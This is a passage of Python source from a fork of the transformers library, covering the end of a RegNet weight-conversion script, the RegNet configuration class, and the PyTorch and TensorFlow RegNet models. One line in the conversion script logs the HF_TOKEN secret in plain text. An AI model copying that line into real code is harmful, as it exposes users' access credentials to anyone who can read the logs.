dest_key = from_to_ours_keys[src_key]
# store the parameter with our key
converted_state_dict[dest_key] = from_state_dict[key]
not_used_keys.remove(key)
# check that all keys have been updated
assert len(not_used_keys) == 0, f"Some keys where not used {','.join(not_used_keys)}"
logger.info(f"The following keys were not used: {','.join(not_used_keys)}")
# save our state dict to disk
torch.save(converted_state_dict, save_directory / f"{model_name}.pth")
del converted_state_dict
else:
logger.info("The state_dict was already stored on disk.")
if push_to_hub:
logger.info(f"Token is {os.environ['HF_TOKEN']}")
logger.info("Loading our model.")
# create our model
our_config = names_to_config[model_name]
our_model_func = RegNetModel
if "in1k" in model_name:
our_model_func = RegNetForImageClassification
our_model = our_model_func(our_config)
# place our model to the meta device (so remove all the weights)
our_model.to(torch.device("meta"))
logger.info("Loading state_dict in our model.")
# load state dict
state_dict_keys = our_model.state_dict().keys()
PreTrainedModel._load_pretrained_model_low_mem(
our_model, state_dict_keys, [save_directory / f"{model_name}.pth"]
)
logger.info("Finally, pushing!")
# push it to hub
our_model.push_to_hub(
repo_path_or_name=save_directory / model_name,
commit_message="Add model",
output_dir=save_directory / model_name,
)
size = 384
# we can use the convnext one
feature_extractor = AutoFeatureExtractor.from_pretrained("facebook/convnext-base-224-22k-1k", size=size)
feature_extractor.push_to_hub(
repo_path_or_name=save_directory / model_name,
commit_message="Add feature extractor",
output_dir=save_directory / model_name,
)
if __name__ == "__main__":
parser = argparse.ArgumentParser()
# Required parameters
parser.add_argument(
"--model_name",
default=None,
type=str,
help=(
"The name of the model you wish to convert, it must be one of the supported regnet* architecture,"
" currently: regnetx-*, regnety-*. If `None`, all of them will the converted."
),
)
parser.add_argument(
"--pytorch_dump_folder_path",
default=None,
type=Path,
required=True,
help="Path to the output PyTorch model directory.",
)
parser.add_argument(
"--push_to_hub",
default=True,
type=bool,
required=False,
help="If True, push model and feature extractor to the hub.",
)
args = parser.parse_args()
pytorch_dump_folder_path: Path = args.pytorch_dump_folder_path
pytorch_dump_folder_path.mkdir(exist_ok=True, parents=True)
convert_weights_and_push(pytorch_dump_folder_path, args.model_name, args.push_to_hub)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 4,088 | src/transformers/models/regnet/configuration_regnet.py | # coding=utf-8
# Copyright 2022 Meta Platforms, Inc. and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" RegNet model configuration"""
from ...configuration_utils import PretrainedConfig
from ...utils import logging
logger = logging.get_logger(__name__)
REGNET_PRETRAINED_CONFIG_ARCHIVE_MAP = {
"facebook/regnet-y-040": "https://huggingface.co/facebook/regnet-y-040/blob/main/config.json",
}
class RegNetConfig(PretrainedConfig):
r"""
This is the configuration class to store the configuration of a [`RegNetModel`]. It is used to instantiate a RegNet
model according to the specified arguments, defining the model architecture. Instantiating a configuration with the
defaults will yield a similar configuration to that of the RegNet
[facebook/regnet-y-040](https://huggingface.co/facebook/regnet-y-040) architecture.
Configuration objects inherit from [`PretrainedConfig`] and can be used to control the model outputs. Read the
documentation from [`PretrainedConfig`] for more information.
Args:
num_channels (`int`, *optional*, defaults to 3):
The number of input channels.
embedding_size (`int`, *optional*, defaults to 64):
Dimensionality (hidden size) for the embedding layer.
hidden_sizes (`List[int]`, *optional*, defaults to `[256, 512, 1024, 2048]`):
Dimensionality (hidden size) at each stage.
depths (`List[int]`, *optional*, defaults to `[3, 4, 6, 3]`):
Depth (number of layers) for each stage.
layer_type (`str`, *optional*, defaults to `"y"`):
The layer to use, it can be either `"x" or `"y"`. An `x` layer is a ResNet's BottleNeck layer with
`reduction` fixed to `1`. While a `y` layer is a `x` but with squeeze and excitation. Please refer to the
paper for a detailed explanation of how these layers were constructed.
hidden_act (`str`, *optional*, defaults to `"relu"`):
The non-linear activation function in each block. If string, `"gelu"`, `"relu"`, `"selu"` and `"gelu_new"`
are supported.
downsample_in_first_stage (`bool`, *optional*, defaults to `False`):
If `True`, the first stage will downsample the inputs using a `stride` of 2.
Example:
```python
>>> from transformers import RegNetConfig, RegNetModel
>>> # Initializing a RegNet regnet-y-40 style configuration
>>> configuration = RegNetConfig()
>>> # Initializing a model from the regnet-y-40 style configuration
>>> model = RegNetModel(configuration)
>>> # Accessing the model configuration
>>> configuration = model.config
```
"""
model_type = "regnet"
layer_types = ["x", "y"]
def __init__(
self,
num_channels=3,
embedding_size=32,
hidden_sizes=[128, 192, 512, 1088],
depths=[2, 6, 12, 2],
groups_width=64,
layer_type="y",
hidden_act="relu",
**kwargs,
):
super().__init__(**kwargs)
if layer_type not in self.layer_types:
raise ValueError(f"layer_type={layer_type} is not one of {','.join(self.layer_types)}")
self.num_channels = num_channels
self.embedding_size = embedding_size
self.hidden_sizes = hidden_sizes
self.depths = depths
self.groups_width = groups_width
self.layer_type = layer_type
self.hidden_act = hidden_act
# always downsample in the first stage
self.downsample_in_first_stage = True
|
27182812/ChatGLM-LLaMA-chinese-insturct | 17,533 | src/transformers/models/regnet/modeling_regnet.py | # coding=utf-8
# Copyright 2022 Meta Platforms, Inc. and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" PyTorch RegNet model."""
from typing import Optional
import torch
import torch.utils.checkpoint
from torch import Tensor, nn
from torch.nn import BCEWithLogitsLoss, CrossEntropyLoss, MSELoss
from ...activations import ACT2FN
from ...file_utils import add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward
from ...modeling_outputs import (
BaseModelOutputWithNoAttention,
BaseModelOutputWithPoolingAndNoAttention,
ImageClassifierOutputWithNoAttention,
)
from ...modeling_utils import PreTrainedModel
from ...utils import logging
from .configuration_regnet import RegNetConfig
logger = logging.get_logger(__name__)
# General docstring
_CONFIG_FOR_DOC = "RegNetConfig"
# Base docstring
_CHECKPOINT_FOR_DOC = "facebook/regnet-y-040"
_EXPECTED_OUTPUT_SHAPE = [1, 1088, 7, 7]
# Image classification docstring
_IMAGE_CLASS_CHECKPOINT = "facebook/regnet-y-040"
_IMAGE_CLASS_EXPECTED_OUTPUT = "tabby, tabby cat"
REGNET_PRETRAINED_MODEL_ARCHIVE_LIST = [
"facebook/regnet-y-040",
# See all regnet models at https://huggingface.co/models?filter=regnet
]
class RegNetConvLayer(nn.Module):
def __init__(
self,
in_channels: int,
out_channels: int,
kernel_size: int = 3,
stride: int = 1,
groups: int = 1,
activation: Optional[str] = "relu",
):
super().__init__()
self.convolution = nn.Conv2d(
in_channels,
out_channels,
kernel_size=kernel_size,
stride=stride,
padding=kernel_size // 2,
groups=groups,
bias=False,
)
self.normalization = nn.BatchNorm2d(out_channels)
self.activation = ACT2FN[activation] if activation is not None else nn.Identity()
def forward(self, hidden_state):
hidden_state = self.convolution(hidden_state)
hidden_state = self.normalization(hidden_state)
hidden_state = self.activation(hidden_state)
return hidden_state
class RegNetEmbeddings(nn.Module):
"""
RegNet Embedddings (stem) composed of a single aggressive convolution.
"""
def __init__(self, config: RegNetConfig):
super().__init__()
self.embedder = RegNetConvLayer(
config.num_channels, config.embedding_size, kernel_size=3, stride=2, activation=config.hidden_act
)
self.num_channels = config.num_channels
def forward(self, pixel_values):
num_channels = pixel_values.shape[1]
if num_channels != self.num_channels:
raise ValueError(
"Make sure that the channel dimension of the pixel values match with the one set in the configuration."
)
hidden_state = self.embedder(pixel_values)
return hidden_state
# Copied from transformers.models.resnet.modeling_resnet.ResNetShortCut with ResNet->RegNet
class RegNetShortCut(nn.Module):
"""
RegNet shortcut, used to project the residual features to the correct size. If needed, it is also used to
downsample the input using `stride=2`.
"""
def __init__(self, in_channels: int, out_channels: int, stride: int = 2):
super().__init__()
self.convolution = nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=stride, bias=False)
self.normalization = nn.BatchNorm2d(out_channels)
def forward(self, input: Tensor) -> Tensor:
hidden_state = self.convolution(input)
hidden_state = self.normalization(hidden_state)
return hidden_state
class RegNetSELayer(nn.Module):
"""
Squeeze and Excitation layer (SE) proposed in [Squeeze-and-Excitation Networks](https://arxiv.org/abs/1709.01507).
"""
def __init__(self, in_channels: int, reduced_channels: int):
super().__init__()
self.pooler = nn.AdaptiveAvgPool2d((1, 1))
self.attention = nn.Sequential(
nn.Conv2d(in_channels, reduced_channels, kernel_size=1),
nn.ReLU(),
nn.Conv2d(reduced_channels, in_channels, kernel_size=1),
nn.Sigmoid(),
)
def forward(self, hidden_state):
# b c h w -> b c 1 1
pooled = self.pooler(hidden_state)
attention = self.attention(pooled)
hidden_state = hidden_state * attention
return hidden_state
class RegNetXLayer(nn.Module):
"""
RegNet's layer composed by three `3x3` convolutions, same as a ResNet bottleneck layer with reduction = 1.
"""
def __init__(self, config: RegNetConfig, in_channels: int, out_channels: int, stride: int = 1):
super().__init__()
should_apply_shortcut = in_channels != out_channels or stride != 1
groups = max(1, out_channels // config.groups_width)
self.shortcut = (
RegNetShortCut(in_channels, out_channels, stride=stride) if should_apply_shortcut else nn.Identity()
)
self.layer = nn.Sequential(
RegNetConvLayer(in_channels, out_channels, kernel_size=1, activation=config.hidden_act),
RegNetConvLayer(out_channels, out_channels, stride=stride, groups=groups, activation=config.hidden_act),
RegNetConvLayer(out_channels, out_channels, kernel_size=1, activation=None),
)
self.activation = ACT2FN[config.hidden_act]
def forward(self, hidden_state):
residual = hidden_state
hidden_state = self.layer(hidden_state)
residual = self.shortcut(residual)
hidden_state += residual
hidden_state = self.activation(hidden_state)
return hidden_state
class RegNetYLayer(nn.Module):
"""
RegNet's Y layer: an X layer with Squeeze and Excitation.
"""
def __init__(self, config: RegNetConfig, in_channels: int, out_channels: int, stride: int = 1):
super().__init__()
should_apply_shortcut = in_channels != out_channels or stride != 1
groups = max(1, out_channels // config.groups_width)
self.shortcut = (
RegNetShortCut(in_channels, out_channels, stride=stride) if should_apply_shortcut else nn.Identity()
)
self.layer = nn.Sequential(
RegNetConvLayer(in_channels, out_channels, kernel_size=1, activation=config.hidden_act),
RegNetConvLayer(out_channels, out_channels, stride=stride, groups=groups, activation=config.hidden_act),
RegNetSELayer(out_channels, reduced_channels=int(round(in_channels / 4))),
RegNetConvLayer(out_channels, out_channels, kernel_size=1, activation=None),
)
self.activation = ACT2FN[config.hidden_act]
def forward(self, hidden_state):
residual = hidden_state
hidden_state = self.layer(hidden_state)
residual = self.shortcut(residual)
hidden_state += residual
hidden_state = self.activation(hidden_state)
return hidden_state
class RegNetStage(nn.Module):
"""
A RegNet stage composed by stacked layers.
"""
def __init__(
self,
config: RegNetConfig,
in_channels: int,
out_channels: int,
stride: int = 2,
depth: int = 2,
):
super().__init__()
layer = RegNetXLayer if config.layer_type == "x" else RegNetYLayer
self.layers = nn.Sequential(
# downsampling is done in the first layer with stride of 2
layer(
config,
in_channels,
out_channels,
stride=stride,
),
*[layer(config, out_channels, out_channels) for _ in range(depth - 1)],
)
def forward(self, hidden_state):
hidden_state = self.layers(hidden_state)
return hidden_state
class RegNetEncoder(nn.Module):
def __init__(self, config: RegNetConfig):
super().__init__()
self.stages = nn.ModuleList([])
# based on `downsample_in_first_stage`, the first layer of the first stage may or may not downsample the input
self.stages.append(
RegNetStage(
config,
config.embedding_size,
config.hidden_sizes[0],
stride=2 if config.downsample_in_first_stage else 1,
depth=config.depths[0],
)
)
in_out_channels = zip(config.hidden_sizes, config.hidden_sizes[1:])
for (in_channels, out_channels), depth in zip(in_out_channels, config.depths[1:]):
self.stages.append(RegNetStage(config, in_channels, out_channels, depth=depth))
def forward(
self, hidden_state: Tensor, output_hidden_states: bool = False, return_dict: bool = True
) -> BaseModelOutputWithNoAttention:
hidden_states = () if output_hidden_states else None
for stage_module in self.stages:
if output_hidden_states:
hidden_states = hidden_states + (hidden_state,)
hidden_state = stage_module(hidden_state)
if output_hidden_states:
hidden_states = hidden_states + (hidden_state,)
if not return_dict:
return tuple(v for v in [hidden_state, hidden_states] if v is not None)
return BaseModelOutputWithNoAttention(last_hidden_state=hidden_state, hidden_states=hidden_states)
class RegNetPreTrainedModel(PreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = RegNetConfig
base_model_prefix = "regnet"
main_input_name = "pixel_values"
supports_gradient_checkpointing = True
# Copied from transformers.models.resnet.modeling_resnet.ResNetPreTrainedModel._init_weights
def _init_weights(self, module):
if isinstance(module, nn.Conv2d):
nn.init.kaiming_normal_(module.weight, mode="fan_out", nonlinearity="relu")
elif isinstance(module, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(module.weight, 1)
nn.init.constant_(module.bias, 0)
def _set_gradient_checkpointing(self, module, value=False):
if isinstance(module, RegNetModel):
module.gradient_checkpointing = value
REGNET_START_DOCSTRING = r"""
This model is a PyTorch [torch.nn.Module](https://pytorch.org/docs/stable/nn.html#torch.nn.Module) subclass. Use it
as a regular PyTorch Module and refer to the PyTorch documentation for all matter related to general usage and
behavior.
Parameters:
config ([`RegNetConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~PreTrainedModel.from_pretrained`] method to load the model weights.
"""
REGNET_INPUTS_DOCSTRING = r"""
Args:
pixel_values (`torch.FloatTensor` of shape `(batch_size, num_channels, height, width)`):
Pixel values. Pixel values can be obtained using [`AutoImageProcessor`]. See
[`ConvNextImageProcessor.__call__`] for details.
output_hidden_states (`bool`, *optional*):
Whether or not to return the hidden states of all layers. See `hidden_states` under returned tensors for
more detail.
return_dict (`bool`, *optional*):
Whether or not to return a [`~file_utils.ModelOutput`] instead of a plain tuple.
"""
@add_start_docstrings(
"The bare RegNet model outputting raw features without any specific head on top.",
REGNET_START_DOCSTRING,
)
# Copied from transformers.models.resnet.modeling_resnet.ResNetModel with RESNET->REGNET,ResNet->RegNet
class RegNetModel(RegNetPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.config = config
self.embedder = RegNetEmbeddings(config)
self.encoder = RegNetEncoder(config)
self.pooler = nn.AdaptiveAvgPool2d((1, 1))
# Initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(REGNET_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
checkpoint=_CHECKPOINT_FOR_DOC,
output_type=BaseModelOutputWithPoolingAndNoAttention,
config_class=_CONFIG_FOR_DOC,
modality="vision",
expected_output=_EXPECTED_OUTPUT_SHAPE,
)
def forward(
self, pixel_values: Tensor, output_hidden_states: Optional[bool] = None, return_dict: Optional[bool] = None
) -> BaseModelOutputWithPoolingAndNoAttention:
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
embedding_output = self.embedder(pixel_values)
encoder_outputs = self.encoder(
embedding_output, output_hidden_states=output_hidden_states, return_dict=return_dict
)
last_hidden_state = encoder_outputs[0]
pooled_output = self.pooler(last_hidden_state)
if not return_dict:
return (last_hidden_state, pooled_output) + encoder_outputs[1:]
return BaseModelOutputWithPoolingAndNoAttention(
last_hidden_state=last_hidden_state,
pooler_output=pooled_output,
hidden_states=encoder_outputs.hidden_states,
)
@add_start_docstrings(
"""
RegNet Model with an image classification head on top (a linear layer on top of the pooled features), e.g. for
ImageNet.
""",
REGNET_START_DOCSTRING,
)
# Copied from transformers.models.resnet.modeling_resnet.ResNetForImageClassification with RESNET->REGNET,ResNet->RegNet,resnet->regnet
class RegNetForImageClassification(RegNetPreTrainedModel):
def __init__(self, config):
super().__init__(config)
self.num_labels = config.num_labels
self.regnet = RegNetModel(config)
# classification head
self.classifier = nn.Sequential(
nn.Flatten(),
nn.Linear(config.hidden_sizes[-1], config.num_labels) if config.num_labels > 0 else nn.Identity(),
)
# initialize weights and apply final processing
self.post_init()
@add_start_docstrings_to_model_forward(REGNET_INPUTS_DOCSTRING)
@add_code_sample_docstrings(
checkpoint=_IMAGE_CLASS_CHECKPOINT,
output_type=ImageClassifierOutputWithNoAttention,
config_class=_CONFIG_FOR_DOC,
expected_output=_IMAGE_CLASS_EXPECTED_OUTPUT,
)
def forward(
self,
pixel_values: Optional[torch.FloatTensor] = None,
labels: Optional[torch.LongTensor] = None,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
) -> ImageClassifierOutputWithNoAttention:
r"""
labels (`torch.LongTensor` of shape `(batch_size,)`, *optional*):
Labels for computing the image classification/regression loss. Indices should be in `[0, ...,
config.num_labels - 1]`. If `config.num_labels > 1` a classification loss is computed (Cross-Entropy).
"""
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
outputs = self.regnet(pixel_values, output_hidden_states=output_hidden_states, return_dict=return_dict)
pooled_output = outputs.pooler_output if return_dict else outputs[1]
logits = self.classifier(pooled_output)
loss = None
if labels is not None:
if self.config.problem_type is None:
if self.num_labels == 1:
self.config.problem_type = "regression"
elif self.num_labels > 1 and (labels.dtype == torch.long or labels.dtype == torch.int):
self.config.problem_type = "single_label_classification"
else:
self.config.problem_type = "multi_label_classification"
if self.config.problem_type == "regression":
loss_fct = MSELoss()
if self.num_labels == 1:
loss = loss_fct(logits.squeeze(), labels.squeeze())
else:
loss = loss_fct(logits, labels)
elif self.config.problem_type == "single_label_classification":
loss_fct = CrossEntropyLoss()
loss = loss_fct(logits.view(-1, self.num_labels), labels.view(-1))
elif self.config.problem_type == "multi_label_classification":
loss_fct = BCEWithLogitsLoss()
loss = loss_fct(logits, labels)
if not return_dict:
output = (logits,) + outputs[2:]
return (loss,) + output if loss is not None else output
return ImageClassifierOutputWithNoAttention(loss=loss, logits=logits, hidden_states=outputs.hidden_states)
|
27182812/ChatGLM-LLaMA-chinese-insturct | 21,002 | src/transformers/models/regnet/modeling_tf_regnet.py | # coding=utf-8
# Copyright 2022 Meta Platforms, Inc. and The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
""" TensorFlow RegNet model."""
from typing import Dict, Optional, Tuple, Union
import tensorflow as tf
from ...activations_tf import ACT2FN
from ...file_utils import add_code_sample_docstrings, add_start_docstrings, add_start_docstrings_to_model_forward
from ...modeling_tf_outputs import (
TFBaseModelOutputWithNoAttention,
TFBaseModelOutputWithPoolingAndNoAttention,
TFSequenceClassifierOutput,
)
from ...modeling_tf_utils import TFPreTrainedModel, TFSequenceClassificationLoss, keras_serializable, unpack_inputs
from ...tf_utils import shape_list
from ...utils import logging
from .configuration_regnet import RegNetConfig
logger = logging.get_logger(__name__)
# General docstring
_CONFIG_FOR_DOC = "RegNetConfig"
# Base docstring
_CHECKPOINT_FOR_DOC = "facebook/regnet-y-040"
_EXPECTED_OUTPUT_SHAPE = [1, 1088, 7, 7]
# Image classification docstring
_IMAGE_CLASS_CHECKPOINT = "facebook/regnet-y-040"
_IMAGE_CLASS_EXPECTED_OUTPUT = "tabby, tabby cat"
TF_REGNET_PRETRAINED_MODEL_ARCHIVE_LIST = [
"facebook/regnet-y-040",
# See all regnet models at https://huggingface.co/models?filter=regnet
]
class TFRegNetConvLayer(tf.keras.layers.Layer):
def __init__(
self,
out_channels: int,
kernel_size: int = 3,
stride: int = 1,
groups: int = 1,
activation: Optional[str] = "relu",
**kwargs,
):
super().__init__(**kwargs)
# The padding and conv has been verified in
# https://colab.research.google.com/gist/sayakpaul/854bc10eeaf21c9ee2119e0b9f3841a7/scratchpad.ipynb
self.padding = tf.keras.layers.ZeroPadding2D(padding=kernel_size // 2)
self.convolution = tf.keras.layers.Conv2D(
filters=out_channels,
kernel_size=kernel_size,
strides=stride,
padding="VALID",
groups=groups,
use_bias=False,
name="convolution",
)
self.normalization = tf.keras.layers.BatchNormalization(epsilon=1e-5, momentum=0.9, name="normalization")
self.activation = ACT2FN[activation] if activation is not None else tf.identity
def call(self, hidden_state):
hidden_state = self.convolution(self.padding(hidden_state))
hidden_state = self.normalization(hidden_state)
hidden_state = self.activation(hidden_state)
return hidden_state
class TFRegNetEmbeddings(tf.keras.layers.Layer):
"""
RegNet Embeddings (stem) composed of a single aggressive convolution.
"""
def __init__(self, config: RegNetConfig, **kwargs):
super().__init__(**kwargs)
self.num_channels = config.num_channels
self.embedder = TFRegNetConvLayer(
out_channels=config.embedding_size,
kernel_size=3,
stride=2,
activation=config.hidden_act,
name="embedder",
)
def call(self, pixel_values):
num_channels = shape_list(pixel_values)[1]
if tf.executing_eagerly() and num_channels != self.num_channels:
raise ValueError(
"Make sure that the channel dimension of the pixel values match with the one set in the configuration."
)
# When running on CPU, `tf.keras.layers.Conv2D` doesn't support `NCHW` format.
# So change the input format from `NCHW` to `NHWC`.
# shape = (batch_size, in_height, in_width, in_channels=num_channels)
pixel_values = tf.transpose(pixel_values, perm=(0, 2, 3, 1))
hidden_state = self.embedder(pixel_values)
return hidden_state
class TFRegNetShortCut(tf.keras.layers.Layer):
"""
RegNet shortcut, used to project the residual features to the correct size. If needed, it is also used to
downsample the input using `stride=2`.
"""
def __init__(self, out_channels: int, stride: int = 2, **kwargs):
super().__init__(**kwargs)
self.convolution = tf.keras.layers.Conv2D(
filters=out_channels, kernel_size=1, strides=stride, use_bias=False, name="convolution"
)
self.normalization = tf.keras.layers.BatchNormalization(epsilon=1e-5, momentum=0.9, name="normalization")
def call(self, inputs: tf.Tensor, training: bool = False) -> tf.Tensor:
return self.normalization(self.convolution(inputs), training=training)
class TFRegNetSELayer(tf.keras.layers.Layer):
"""
Squeeze and Excitation layer (SE) proposed in [Squeeze-and-Excitation Networks](https://arxiv.org/abs/1709.01507).
"""
def __init__(self, in_channels: int, reduced_channels: int, **kwargs):
super().__init__(**kwargs)
self.pooler = tf.keras.layers.GlobalAveragePooling2D(keepdims=True, name="pooler")
self.attention = [
tf.keras.layers.Conv2D(filters=reduced_channels, kernel_size=1, activation="relu", name="attention.0"),
tf.keras.layers.Conv2D(filters=in_channels, kernel_size=1, activation="sigmoid", name="attention.2"),
]
def call(self, hidden_state):
# [batch_size, h, w, num_channels] -> [batch_size, 1, 1, num_channels]
pooled = self.pooler(hidden_state)
for layer_module in self.attention:
pooled = layer_module(pooled)
hidden_state = hidden_state * pooled
return hidden_state
class TFRegNetXLayer(tf.keras.layers.Layer):
"""
RegNet's layer composed by three `3x3` convolutions, same as a ResNet bottleneck layer with reduction = 1.
"""
def __init__(self, config: RegNetConfig, in_channels: int, out_channels: int, stride: int = 1, **kwargs):
super().__init__(**kwargs)
should_apply_shortcut = in_channels != out_channels or stride != 1
groups = max(1, out_channels // config.groups_width)
self.shortcut = (
TFRegNetShortCut(out_channels, stride=stride, name="shortcut")
if should_apply_shortcut
else tf.keras.layers.Activation("linear", name="shortcut")
)
# `self.layers` instead of `self.layer` because that is a reserved argument.
self.layers = [
TFRegNetConvLayer(out_channels, kernel_size=1, activation=config.hidden_act, name="layer.0"),
TFRegNetConvLayer(
out_channels, stride=stride, groups=groups, activation=config.hidden_act, name="layer.1"
),
TFRegNetConvLayer(out_channels, kernel_size=1, activation=None, name="layer.2"),
]
self.activation = ACT2FN[config.hidden_act]
def call(self, hidden_state):
residual = hidden_state
for layer_module in self.layers:
hidden_state = layer_module(hidden_state)
residual = self.shortcut(residual)
hidden_state += residual
hidden_state = self.activation(hidden_state)
return hidden_state
class TFRegNetYLayer(tf.keras.layers.Layer):
"""
RegNet's Y layer: an X layer with Squeeze and Excitation.
"""
def __init__(self, config: RegNetConfig, in_channels: int, out_channels: int, stride: int = 1, **kwargs):
super().__init__(**kwargs)
should_apply_shortcut = in_channels != out_channels or stride != 1
groups = max(1, out_channels // config.groups_width)
self.shortcut = (
TFRegNetShortCut(out_channels, stride=stride, name="shortcut")
if should_apply_shortcut
else tf.keras.layers.Activation("linear", name="shortcut")
)
self.layers = [
TFRegNetConvLayer(out_channels, kernel_size=1, activation=config.hidden_act, name="layer.0"),
TFRegNetConvLayer(
out_channels, stride=stride, groups=groups, activation=config.hidden_act, name="layer.1"
),
TFRegNetSELayer(out_channels, reduced_channels=int(round(in_channels / 4)), name="layer.2"),
TFRegNetConvLayer(out_channels, kernel_size=1, activation=None, name="layer.3"),
]
self.activation = ACT2FN[config.hidden_act]
def call(self, hidden_state):
residual = hidden_state
for layer_module in self.layers:
hidden_state = layer_module(hidden_state)
residual = self.shortcut(residual)
hidden_state += residual
hidden_state = self.activation(hidden_state)
return hidden_state
class TFRegNetStage(tf.keras.layers.Layer):
"""
A RegNet stage composed by stacked layers.
"""
def __init__(
self, config: RegNetConfig, in_channels: int, out_channels: int, stride: int = 2, depth: int = 2, **kwargs
):
super().__init__(**kwargs)
layer = TFRegNetXLayer if config.layer_type == "x" else TFRegNetYLayer
self.layers = [
# downsampling is done in the first layer with stride of 2
layer(config, in_channels, out_channels, stride=stride, name="layers.0"),
*[layer(config, out_channels, out_channels, name=f"layers.{i+1}") for i in range(depth - 1)],
]
def call(self, hidden_state):
for layer_module in self.layers:
hidden_state = layer_module(hidden_state)
return hidden_state
class TFRegNetEncoder(tf.keras.layers.Layer):
def __init__(self, config: RegNetConfig, **kwargs):
super().__init__(**kwargs)
self.stages = []
# based on `downsample_in_first_stage`, the first layer of the first stage may or may not downsample the input
self.stages.append(
TFRegNetStage(
config,
config.embedding_size,
config.hidden_sizes[0],
stride=2 if config.downsample_in_first_stage else 1,
depth=config.depths[0],
name="stages.0",
)
)
in_out_channels = zip(config.hidden_sizes, config.hidden_sizes[1:])
for i, ((in_channels, out_channels), depth) in enumerate(zip(in_out_channels, config.depths[1:])):
self.stages.append(TFRegNetStage(config, in_channels, out_channels, depth=depth, name=f"stages.{i+1}"))
def call(
self, hidden_state: tf.Tensor, output_hidden_states: bool = False, return_dict: bool = True
) -> TFBaseModelOutputWithNoAttention:
hidden_states = () if output_hidden_states else None
for stage_module in self.stages:
if output_hidden_states:
hidden_states = hidden_states + (hidden_state,)
hidden_state = stage_module(hidden_state)
if output_hidden_states:
hidden_states = hidden_states + (hidden_state,)
if not return_dict:
return tuple(v for v in [hidden_state, hidden_states] if v is not None)
return TFBaseModelOutputWithNoAttention(last_hidden_state=hidden_state, hidden_states=hidden_states)
@keras_serializable
class TFRegNetMainLayer(tf.keras.layers.Layer):
config_class = RegNetConfig
def __init__(self, config, **kwargs):
super().__init__(**kwargs)
self.config = config
self.embedder = TFRegNetEmbeddings(config, name="embedder")
self.encoder = TFRegNetEncoder(config, name="encoder")
self.pooler = tf.keras.layers.GlobalAveragePooling2D(keepdims=True, name="pooler")
@unpack_inputs
def call(
self,
pixel_values: tf.Tensor,
output_hidden_states: Optional[bool] = None,
return_dict: Optional[bool] = None,
training: bool = False,
) -> TFBaseModelOutputWithPoolingAndNoAttention:
output_hidden_states = (
output_hidden_states if output_hidden_states is not None else self.config.output_hidden_states
)
return_dict = return_dict if return_dict is not None else self.config.use_return_dict
embedding_output = self.embedder(pixel_values, training=training)
encoder_outputs = self.encoder(
embedding_output, output_hidden_states=output_hidden_states, return_dict=return_dict, training=training
)
last_hidden_state = encoder_outputs[0]
pooled_output = self.pooler(last_hidden_state)
# Change to NCHW output format have uniformity in the modules
pooled_output = tf.transpose(pooled_output, perm=(0, 3, 1, 2))
last_hidden_state = tf.transpose(last_hidden_state, perm=(0, 3, 1, 2))
# Change the other hidden state outputs to NCHW as well
if output_hidden_states:
hidden_states = tuple([tf.transpose(h, perm=(0, 3, 1, 2)) for h in encoder_outputs[1]])
if not return_dict:
return (last_hidden_state, pooled_output) + encoder_outputs[1:]
return TFBaseModelOutputWithPoolingAndNoAttention(
last_hidden_state=last_hidden_state,
pooler_output=pooled_output,
hidden_states=hidden_states if output_hidden_states else encoder_outputs.hidden_states,
)
class TFRegNetPreTrainedModel(TFPreTrainedModel):
"""
An abstract class to handle weights initialization and a simple interface for downloading and loading pretrained
models.
"""
config_class = RegNetConfig
base_model_prefix = "regnet"
main_input_name = "pixel_values"
@property
def dummy_inputs(self) -> Dict[str, tf.Tensor]:
"""
Dummy inputs to build the network.
Returns:
`Dict[str, tf.Tensor]`: The dummy inputs.
"""
VISION_DUMMY_INPUTS = tf.random.uniform(shape=(3, self.config.num_channels, 224, 224), dtype=tf.float32)
return {"pixel_values": tf.constant(VISION_DUMMY_INPUTS)}
@tf.function(
input_signature=[
{
"pixel_values": tf.TensorSpec((None, None, None, None), tf.float32, name="pixel_values"),
}
]
)
def serving(self, inputs):
"""
Method used for serving the model.
Args:
inputs (`Dict[str, tf.Tensor]`):
The input of the saved model as a dictionary of tensors.
"""
output = self.call(inputs)
return self.serving_output(output)
REGNET_START_DOCSTRING = r"""
Parameters:
This model is a Tensorflow
[tf.keras.layers.Layer](https://www.tensorflow.org/api_docs/python/tf/keras/layers/Layer) sub-class. Use it as a
regular Tensorflow Module and refer to the Tensorflow documentation for all matter related to general usage and
behavior.
config ([`RegNetConfig`]): Model configuration class with all the parameters of the model.
Initializing with a config file does not load the weights associated with the model, only the
configuration. Check out the [`~TFPreTrainedModel.from_pretrained`] method to load the model weights.
"""
